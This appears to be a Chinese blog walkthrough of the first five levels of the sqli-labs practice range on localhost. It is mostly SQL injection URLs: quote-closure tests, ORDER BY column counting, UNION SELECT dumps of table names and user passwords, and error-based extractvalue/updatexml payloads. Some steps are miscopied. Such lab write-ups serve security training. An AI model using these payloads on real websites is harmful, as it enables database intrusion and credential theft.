sqli靶场

第一关

  1. 判断闭合类型:http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 --+页面显示不正常,http://127.0.0.1/sqli/Less-1/?id=1' and 1=1 --+页面显示正常,说明是单引号闭合;
  2. 判断显示列数:http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+页面正常,http://127.0.0.1/sqli/Less-1/?id=1' order by 4 --+页面显示不正常,说明为3列;
  3. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,3 --+判断页面回显点
  4. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+显示数据库和所有的表名
  5. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_name='users') --+显示表user里面的所有列
  6. http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+账户名和密码

也可以再判断出闭合类型后使用报错注入,http://127.0.0.1/sqli/Less-1/?id=-1' and 1=extractvalue(1,concat(0x7e,database(),0x7e)) --+爆出数据库名,http://127.0.0.1/sqli/Less-1/?id=-1' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) --+爆出表名,http://127.0.0.1/sqli/Less-1/?id=-1' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) --+爆出列名,(select group_concat(concat_ws('/',username,password)) from users)爆出表里面的数据,不过由于输出长度的显示,使用substr函数进行显示:(select group_concat(concat_ws('/',username,password)) from users)。报错注入还可用updatexml(),不过这个函数是三个参数,其他方面都和extravalue一样。

第二关

  第二关是数字型注入,其他的和第一关都一样

第三关

  第三关和前两关差不多,不过闭合类型改成是')

第四关

  第四关和第三关大致相同,闭合类型为")

第五关

  1. 先判断出闭合类型为',发现页面有报错信息,考虑使用报错注入
  2. http://127.0.0.1/sqli/Less-5/?id=-1' and 1=updatexml(1,(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)),1)  --+爆出表名
  3. http://127.0.0.1/sqli/Less-5/?id=-1' and 1=updatexml(1,(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e)),1)  --+爆列名
posted @ 2021-01-09 16:13  KEEP12  阅读(168)  评论(0)    收藏  举报